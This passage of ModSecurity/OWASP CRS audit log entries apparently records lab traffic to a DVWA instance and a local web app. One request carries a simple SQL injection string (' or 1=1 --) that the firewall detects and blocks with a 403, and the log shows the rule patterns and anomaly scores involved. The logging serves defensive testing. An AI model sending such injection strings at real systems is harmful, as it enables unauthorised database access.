max=93","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRdUWn8AAQEAABwQSC8AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":602,"p2":2092,"p3":113,"p4":643,"p5":83,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:48 --0400","transaction_id":"WRdUXH8AAQEAABwQSDAAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=92","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXH8AAQEAABwQSDAAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":385,"p2":1895,"p3":96,"p4":507,"p5":80,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:48 --0400","transaction_id":"WRdUXH8AAQEAABwQSDEAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=91","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXH8AAQEAABwQSDEAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":386,"p2":1579,"p3":87,"p4":365,"p5":94,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:50 --0400","transaction_id":"WRdUXn8AAQEAABwQSDIAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=90","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":578,"p2":4794,"p3":0,"p4":0,"p5":211,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIEAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 18:40:54 GMT","If-None-Match":"\"295-54f6c29741bca\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:45:58 GMT","ETag":"\"295-54f6c3b9c674a\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdUaX8AAQEAABwRiIEAAAAE\"]"],"stopwatch":{"p1":548,"p2":1164,"p3":57,"p4":136,"p5":51,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIIAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdUaX8AAQEAABwRiIIAAAAE\"]"],"stopwatch":{"p1":400,"p2":1170,"p3":49,"p4":440,"p5":239,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIMAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdUaX8AAQEAABwRiIMAAAAE\"]"],"stopwatch":{"p1":353,"p2":881,"p3":44,"p4":245,"p5":68,"sr":15,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}